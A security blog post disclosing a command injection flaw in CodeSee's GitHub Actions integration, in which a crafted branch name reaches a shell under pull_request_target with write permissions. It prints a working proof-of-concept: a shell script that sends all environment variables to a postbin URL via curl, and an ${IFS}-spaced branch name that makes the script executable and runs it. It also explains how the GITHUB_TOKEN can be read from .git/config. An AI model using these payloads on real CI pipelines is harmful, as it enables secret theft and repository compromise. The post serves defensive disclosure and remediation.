Securing open-source projects is hard. Securing CI workflows for open-source projects is no less complex. The CI workflows of open-source projects are by definition exposed to the world and can easily be triggered through PR automation without any code review, giving attackers direct access to dev infrastructure. These automations and workflows often rely on third-party components and integrations to improve the development process.
Sometimes, integrating third-party tools, especially for CI purposes, may expand your project’s attack surface and expose you to risks you didn’t have before. This was the case with CodeSee, with whom we collaborated closely over the past few months to remove one such risk, fixing a vulnerability and applying mitigations affecting thousands of open-source projects.
CodeSee is a startup that provides ways to visualize your codebase and effective tooling for code review and collaboration. Similar to other developer-centric products (e.g., CodeCov), the CodeSee integration creates a new Github Actions workflow that embeds its capabilities in every pull request, allowing developers to efficiently review the added code.
In this blog post, we will describe how we found that this committed workflow contains several vulnerabilities. Chaining these vulnerabilities may allow any user remote code execution (RCE) capabilities on the CI pipeline, which may lead to committing code and exfiltrating sensitive tokens without the proper permissions.
Thousands of open-source projects use CodeSee, including projects with many stars.
Some high-profile projects are:
- https://github.com/freeCodeCamp/freeCodeCamp – The most starred project on Github (356k stars)
- https://github.com/statelyai/xstate – Popular npm package for state machines and state charts. Millions of weekly downloads. (21.6k stars)
- https://github.com/slimtoolkit/slim – Minifying docker containers (15.4k stars)
- Additional tools include C libraries, Python packages, Golang libraries, Kubernetes operators, and more.
We worked closely with CodeSee, which quickly fixed the vulnerabilities, remediating the immediate risk posed to all the open-source projects integrating the workflow. In addition, we created a roadmap with CodeSee engineers to improve the security posture of the workflow deployed in open-source projects:
- Fixing a command injection vulnerability in the codesee npm package that allowed code execution through the branch name. This was fixed in version 0.376.0. Because the workflow pulls the latest version of the package, the fix automatically remediates the issue for all existing integrations.
- Limiting the permissions given to GITHUB_TOKEN through an explicit definition. This feature is an excellent post-exploitation mitigation technique for future vulnerabilities in Github Actions workflows. It applies only to newly integrated projects.
- Implementing the ability to push workflow changes into existing integrations through pull requests and commits to fix future security issues and insert mitigations, such as the permissions mitigation mentioned previously.
- Creating a roadmap to migrate from the risky trigger event pull_request_target to the safer trigger pull_request.
With all these mitigations combined, the integrated workflow has become significantly more secure.
Technical Dive
It all started as standard research in which we scanned the most popular repositories and their Github Actions workflows at scale, trying to find vulnerable CI workflows. During that scan, we found many duplicate workflows in different open-source projects. One of those workflows originated from the projects’ integration with CodeSee, a third-party application that lets you visualize your codebase. When we reached out, CodeSee was eager to collaborate with us to secure their workflow.
Analyzing the Github Action Workflow
The workflow looks like the following:
    # This workflow was added by CodeSee. Learn more at https://codesee.io/
    on:
      pull_request_target:
        types: [opened, synchronize, reopened]
      workflow_dispatch:

    name: CodeSee Map

    jobs:
      test_map_action:
        runs-on: ubuntu-latest
        continue-on-error: true
        name: Run CodeSee Map Analysis
        steps:
          - name: checkout
            id: checkout
            uses: actions/checkout@v2
            with:
              ref: ${{ github.event.pull_request.head.ref }}

          ...

          # codesee-detect-languages has an output with id languages.
          - name: Detect Languages
            id: detect-languages
            uses: Codesee-io/codesee-detect-languages-action@latest

          # Configures different environments
          ...

          - name: Generate Map
            id: generate-map
            uses: Codesee-io/codesee-map-action@latest
            with:
              step: map
              ...

          - name: Upload Map
            id: upload-map
            uses: Codesee-io/codesee-map-action@latest
            with:
              step: mapUpload
              ...

          - name: Insights
            id: insights
            uses: Codesee-io/codesee-map-action@latest
            with:
              step: insights
              ...
Due to a series of vulnerabilities and misconfigurations in the workflow above, we were able to completely take over the build machine, which may have led to dangerous malicious behavior.
We will list the issues found and the possible consequences of such a build hijack.
High Permissions for the Pull Request Trigger
The first issue with the workflow is its use of the unsafe pull_request_target trigger event. The Github security team posted about this dangerous behavior.
The permissions this workflow receives from Github depend on multiple variables:
- The trigger event, in our case pull_request_target. This event indicates that the workflow should be triggered on each new pull request to the repository and be given write permissions and access to read secrets, even when the pull request originates from a fork. By comparison, the pull_request trigger event works similarly, but forked pull requests receive read permissions at most and have no access to secrets.
- An added permissions tag, which limits permissions even further.
- Organization settings, which may also limit the permissions given.

We can tell whether these configurations are used by observing the build logs:
    GITHUB_TOKEN Permissions
      Actions: write
      Checks: write
      Contents: write
      Deployments: write
      Discussions: write
      Issues: write
      Metadata: read
      Packages: write
      Pages: write
      PullRequests: write
      RepositoryProjects: write
      SecurityEvents: write
      Statuses: write
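As a rough illustration of reading that log, the sketch below extracts the scopes that were granted write access. It assumes each scope appears on its own line as "Name: level", as in the log shown here; the function names parseTokenPermissions and writableScopes are hypothetical and not part of any Github tooling.

```javascript
// Hypothetical helper: parse the "GITHUB_TOKEN Permissions" block of a build log.
// Assumes one "Name: level" pair per line; other lines are ignored.
function parseTokenPermissions(logText) {
  const permissions = {};
  for (const line of logText.split("\n")) {
    const match = line.trim().match(/^([A-Za-z]+):\s*(read|write|none)$/);
    if (match) {
      permissions[match[1]] = match[2];
    }
  }
  return permissions;
}

// Return the scopes for which the token was granted write access.
function writableScopes(permissions) {
  return Object.keys(permissions).filter((scope) => permissions[scope] === "write");
}

// A shortened copy of the log above, used as sample input.
const sampleLog = [
  "GITHUB_TOKEN Permissions",
  "  Actions: write",
  "  Contents: write",
  "  Metadata: read",
  "  PullRequests: write",
].join("\n");

const scopes = writableScopes(parseTokenPermissions(sampleLog));
console.log(scopes);
```

Any scope reported here is one that an injected command could abuse through the token, which is why a long list of write scopes on a fork-triggered workflow is a warning sign.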
Reading User Input
The pull_request_target trigger isn’t dangerous on its own. However, if the workflow analyzes the source code of the pull request, a potential attacker can craft malicious input, create a forked pull request, and hijack the build workflow.
The next issue in the chain is the checkout to the head branch of the pull request.
While checking out the pull request code sounds trivial, it isn’t for forked pull requests. When a workflow checks out the code and runs its tooling on it (build tools, scanners, or other tooling), it should treat that code as unsafe. In addition, not every use of the actions/checkout action checks out the forked code. Here, the parameter ref: ${{ github.event.pull_request.head.ref }} indicates that it does.
After the checkout, the workflow runs the CodeSee action Codesee-io/codesee-map-action on the code, which is a wrapper around the codesee npm package. So once we prove that the package analyzes its input insecurely, we’ll be able to perform code execution on the build.
CodeSee was aware of these risks, but their application requires pull_request_target to support the common open-source workflow of contributing through forked pull requests. To mitigate that risk, they took care in writing their code analysis to avoid directly executing any of the code being cloned. They appear to have succeeded in this regard, as we had to discover an additional issue to gain remote code execution.
Vulnerable NPM Package
This is where things get more interesting. Up to this point, the workflow is running with elevated permissions, checking out the user code, and running an internal NPM package on that code, but it does not yet give us any code execution capability.
We could reverse-engineer the package and find vulnerabilities, but we found a shortcut. When we call the Codesee-io/codesee-map-action action with the mapUpload parameter, it calls the codesee@latest NPM package with the upload parameter. It also includes additional arguments, such as the branch name as the -f argument. We know that from the action JS code:
    async function runCodeseeMapUpload(config, githubEventName, githubEventData) {
      const additionalArguments = config.githubRef ? ["-f", config.githubRef] : [];

      if (isPullRequestEvent(githubEventName)) {
        additionalArguments.push("-b", config.githubBaseRef);
        additionalArguments.push("-s", githubEventData.pull_request.base.sha);
        additionalArguments.push("-p", githubEventData.number.toString());
      }

      const args = [
        "codesee@latest",
        "upload",
        "--type",
        "map",
        "--repo",
        `https://github.com/${config.origin}`,
        "-a",
        config.apiToken,
        ...additionalArguments,
        "codesee.map.json",
      ];

      const runExitCode = await exec.exec("npx", args);
      return runExitCode;
    }
So we tried sending unusual branch names to test whether the program sanitizes them correctly. When we created a pull request with the branch name a";ls;"ech, the logs showed that the program crashed:
    Upload Map to Codesee Server
    /usr/local/bin/npx codesee@latest upload --type map --repo https://github.com/AlexILOrg/codesee-demo -a *** -f a";ls;"ech -b main -s b8ac0390a31140ea040c51801cdb9bdc65df6e16 -p 8 codesee.map.json
    codesee v0.364.0
    Fetching main from https://github.com/AlexILOrg/codesee-demo.git
    Error: Command failed: "/usr/bin/git" "merge-base" "b8ac0390a31140ea040c51801cdb9bdc65df6e16" "a";ls;"ech"
    fatal: Not a valid object name a
    /bin/sh: 1: ech: not found
    CodeSee Map failed: Error: The process '/usr/local/bin/npx' failed with exit code 1
    Error: The process '/usr/local/bin/npx' failed with exit code 1
        at ExecState._setResult (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1185:25)
        at ExecState.CheckComplete (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1168:18)
        at ChildProcess.<anonymous> (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1062:27)
        at ChildProcess.emit (events.js:314:20)
        at maybeClose (internal/child_process.js:1022:16)
        at Process.ChildProcess._handle.onexit (internal/child_process.js:287:5)
By investigating this error log, we have two insights:
- fatal: Not a valid object name a – instead of taking the complete branch name a";ls;"ech, git consumed only a. This means that the double quote (") terminated the string.
- /bin/sh: 1: ech: not found – this means /bin/sh tried to run the leftover text ech as a command. The text after the quote is interpreted by the shell, which means we can inject our code!
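The failing command in the log can be reproduced with a small sketch. This is a hypothetical reconstruction rather than the codesee source: it assumes the package wrapped each argument in double quotes and joined everything into a single string for /bin/sh, which is what the "Command failed" line suggests. The function names are made up for illustration, and nothing is executed.

```javascript
// Hypothetical reconstruction, not the codesee source: wrap each argument in
// double quotes and join everything into one string meant for /bin/sh.
function buildNaiveCommand(file, args) {
  return [file, ...args].map((part) => `"${part}"`).join(" ");
}

// Rough illustration of how the shell sees that string: split on ";".
// (A real shell parser is more involved; this is enough for this input.)
function splitOnSemicolons(command) {
  return command.split(";");
}

const branchName = 'a";ls;"ech';
const command = buildNaiveCommand("/usr/bin/git", [
  "merge-base",
  "b8ac0390a31140ea040c51801cdb9bdc65df6e16",
  branchName,
]);

// The string is only printed here, never passed to a shell.
console.log(command);
console.log(splitOnSemicolons(command));
```

The quote inside the branch name closes the argument early, so the shell sees three separate commands: the git call ending in "a", then ls, then "ech".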
Let’s see how we use this to execute arbitrary code.
As an attacker, we can create a new malicious script file that would be fetched together with our forked pull request and executed using our code execution capability. It can be quite tricky because:
- First, we need to give it execution permissions by running chmod. For example, chmod +x ./shell.sh.
- Second, Github doesn’t allow us to put spaces in branch names. It automatically sanitizes them by replacing spaces with dashes (-). This complicates writing a command that gives execution permissions to the shell file.
My Capture-the-Flag (CTF) competition history taught me that such mitigations can have bypasses, and indeed a short Google search showed that spaces can be replaced with ${IFS} in a Linux shell.
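A minimal sketch of the ${IFS} trick, using a harmless echo command. It assumes a POSIX sh is available on the PATH and that IFS has its default value (space, tab, newline); the helper name encodeSpaces is hypothetical.

```javascript
const { execFileSync } = require("node:child_process");

// Replace every space with ${IFS} so the string survives a "no spaces" rule.
// The name encodeSpaces is hypothetical, chosen for this sketch.
function encodeSpaces(command) {
  return command.split(" ").join("${IFS}");
}

const encoded = encodeSpaces("echo hello world");
console.log(encoded);

// Run the space-free string in a POSIX shell. The shell expands ${IFS} and then
// splits the result into fields, which restores the original word boundaries.
const output = execFileSync("sh", ["-c", encoded], { encoding: "utf8" });
console.log(output);
```

The encoded string contains no space characters, yet the shell still runs echo with two separate arguments.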
So let’s sum it up and create the flow that causes remote code execution on the pipeline:
- Let’s say project X contains the vulnerable Github Actions workflow.
- We, as an attacker, fork project X.
- We add a new shell file with our “malicious” code to the fork. That code sends all environment variables to the designated postbin server we just created:

      env > .env
      curl -H 'X-Status: Awesome' --data @'.env' https://www.toptal.com/developers/postbin/1662641903023-0475601626094

- We commit this shell file into a new branch with the following name: name1";chmod${IFS}+x${IFS}shell.sh;./shell.sh;"name2.
- We create a pull request to the main branch of project X from our newly created branch.
This flow will execute our “malicious” payload on the CI system.
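From the defender's side, a workflow or tool that must handle ref names could flag ones like the branch name above before using them. The sketch below is a hypothetical heuristic, not something CodeSee or Github is known to use, and the character set is an assumption chosen for illustration.

```javascript
// Hypothetical heuristic: flag ref names containing characters that a POSIX
// shell treats specially. The character set is an assumption for this sketch.
const SHELL_METACHARACTERS = /["'`$;|&<>(){}\\\s]/;

function looksLikeShellInjection(refName) {
  return SHELL_METACHARACTERS.test(refName);
}

const pocBranch = 'name1";chmod${IFS}+x${IFS}shell.sh;./shell.sh;"name2';

console.log(looksLikeShellInjection(pocBranch));
console.log(looksLikeShellInjection("feature/add-login"));
```

A check like this is only a tripwire. It does not make it safe to pass the value through a shell; the more robust approach is to avoid the shell entirely when running commands with user-controlled values.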
We can safely talk about this PoC code because the NPM vulnerability has been fixed, and all current CodeSee integrations are working with the updated package.
Consequences
One could ask what the big deal with this demonstrated code execution is. After all, the workflow doesn’t contain any interesting environment variables or secrets that the victims should care about. Unfortunately, that is not the main scenario we are afraid of.
Our previous Github Actions vulnerability research showed another scary attack chain. Malicious actors can use a privileged GITHUB_TOKEN to commit additional code to the repository. This would have two consequences:
- Inserting a backdoor into code that will eventually be deployed to end users.
- Inserting a workflow that would exfiltrate all repository and organization secrets. These may include sensitive tokens, such as AWS/GCP/Azure tokens, Docker Hub/PyPI/NPM tokens, Github personal access tokens for other repositories, and more.
For our workflow, an attacker could use the privileged GITHUB_TOKEN used for the checkout command. Printing the .git/config file yields that token.
Remediation
CodeSee’s internal review discovered that this injection vulnerability entered their system as a result of a logical bug in the code used to escape the user-supplied branch name. In addition to repairing that logic directly, they replaced all command executions in their code analysis to run without a shell, ensuring no subtle escaping logic was required. As the CLI is written in Node.js, this involved replacing calls to child_process.exec with child_process.execFile.
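The effect of running without a shell can be sketched as follows. This is an illustration under stated assumptions, not CodeSee's actual fix: printf stands in for git, and a POSIX printf is assumed to be on the PATH.

```javascript
const { execFileSync } = require("node:child_process");

const branchName = 'a";ls;"ech';

// execFile-style calls hand each array element to the program as one argument.
// No shell parses the string, so the quotes and semicolons stay inert.
// printf is used here only as a stand-in for git.
const echoed = execFileSync("printf", ["%s", branchName], { encoding: "utf8" });

// The program received the branch name unchanged, as a single argument.
console.log(echoed === branchName);
```

Because the argument array is never turned into a command string, there is nothing to escape, which is the property the remediation relies on.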
To limit the impact of any future vulnerabilities, CodeSee added the following permissions setting to the workflow:
permissions: read-all
Even if such vulnerabilities are found, the GITHUB_TOKEN won’t have the write permissions needed to commit code or otherwise modify the repository.
Summary
The security process described in this article teaches us three interesting lessons for the emerging landscape of software supply chain security.
The first is the understanding that the threat landscape for the software supply chain keeps growing, especially as more developer-focused companies emerge to improve developer productivity. The second is the ability of security vendors and non-security vendors to collaborate and, de facto, improve the security posture of many open-source projects. The third is the esoteric input vector of code injection through the branch name, which hasn’t been fully investigated yet.
We encourage using the lessons learned from this process and applying them to additional workflows, further hardening the security posture of CI pipelines.
Originally published: December 12, 2022